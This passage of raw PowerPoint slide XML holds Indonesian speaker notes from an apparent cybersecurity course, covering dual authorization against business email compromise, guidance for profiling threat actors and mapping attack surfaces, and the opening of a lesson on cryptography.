              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>dual authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> BEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1669366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Ringkasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>niat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Anda juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meringkas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor-vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Panduan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Membandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Aktor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ikuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panduan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penelitian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Buat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ingatlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inventaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penelitian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperluas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemahaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia</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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6468924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PENGANTAR PELAJARAN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Banyak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sepenuhnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profesional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
